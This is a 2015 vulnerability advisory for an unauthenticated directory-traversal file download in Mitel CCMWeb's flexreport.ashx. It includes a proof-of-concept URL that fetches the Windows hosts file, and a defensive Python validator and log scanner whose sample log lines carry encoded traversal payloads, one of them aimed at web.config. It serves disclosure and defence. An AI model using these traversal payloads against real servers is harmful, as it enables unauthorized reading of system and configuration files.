Advisory Information
Title: Mitel CCMWeb Unauthenticated Local File Inclusion
Date Published: 4th October 2015
Advisory Summary
A lack of input validation allows an attacker to download arbitrary files from the server.
Vendor
Mitel
Affected Software
Product | Version
MiCC (CCMWeb) | 7.x and earlier
Description of Issue
A local file inclusion vulnerability was discovered in MiContact Center version 7.1, in the flexreport component of CCMWeb (flexreport.ashx). The filename parameter is not validated, so an unauthenticated user can supply directory traversal sequences in it and download arbitrary files from the server.
PoC
The following proof of concept downloads the Windows hosts file.
http://1.1.1.1/ccmweb/flexreport.ashx?filename=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
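The missing check described above, shown as an added Python example that is not Mitel's code: a filename validator that confines the flexreport parameter to a single report directory, and a log scan that flags past requests carrying traversal sequences. The report directory, the extension whitelist and the IIS log field order are assumptions made for the example; the log lines are constructed.

```python
from urllib.parse import parse_qs, unquote
from pathlib import PureWindowsPath

REPORT_ROOT = PureWindowsPath(r"C:\inetpub\ccmweb\reports")   # assumed location
ALLOWED_SUFFIXES = {".pdf", ".xls", ".csv"}                   # assumed whitelist

def escapes_directory(filename):
    """True when a (URL-decoded) filename could leave the report directory:
    a '..' segment, an absolute path, a drive letter or a UNC prefix."""
    candidate = PureWindowsPath(filename)
    return ".." in candidate.parts or bool(candidate.drive or candidate.root)

def resolve_report_path(filename, root=REPORT_ROOT):
    """Return the full path of a report under `root`, or None unless `filename`
    is a bare report name with an allowed extension."""
    if not filename or "\x00" in filename or escapes_directory(filename):
        return None
    candidate = PureWindowsPath(filename)
    if len(candidate.parts) != 1:                  # no subdirectories either
        return None
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    return str(root / candidate)

def flag_traversal_requests(log_lines):
    """Return (client_ip, decoded_filename) for each IIS W3C log line (assumed
    fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username
    c-ip ...) that asks flexreport.ashx for a filename escaping the report dir."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 9 or not fields[4].lower().endswith("/ccmweb/flexreport.ashx"):
            continue
        params = parse_qs(fields[5], keep_blank_values=True)
        filename = unquote(params.get("filename", [""])[0])   # second decode: %252e -> %2e -> .
        if filename and escapes_directory(filename):
            hits.append((fields[8], filename))
    return hits

# Constructed log lines in the field order assumed above (not real traffic)
SAMPLE_LOG = [
    "2015-02-01 10:00:01 10.0.0.5 GET /ccmweb/flexreport.ashx filename=monthly.pdf 80 - 10.0.0.20 Mozilla/5.0 200",
    "2015-02-01 10:00:07 10.0.0.5 GET /ccmweb/flexreport.ashx filename=..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts 80 - 198.51.100.7 curl/7.40 200",
    "2015-02-01 10:00:09 10.0.0.5 GET /ccmweb/flexreport.ashx filename=%252e%252e%5Cweb.config 80 - 198.51.100.7 curl/7.40 200",
    "2015-02-01 10:00:12 10.0.0.5 GET /ccmweb/default.aspx - 80 - 10.0.0.21 Mozilla/5.0 200",
]

if __name__ == "__main__":
    for ip, name in flag_traversal_requests(SAMPLE_LOG):
        print(f"{ip} requested {name!r}")
```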
Timeline
Reported – 26th January 2015
Accepted – 31st March 2015
Advisory Published – 4th October 2015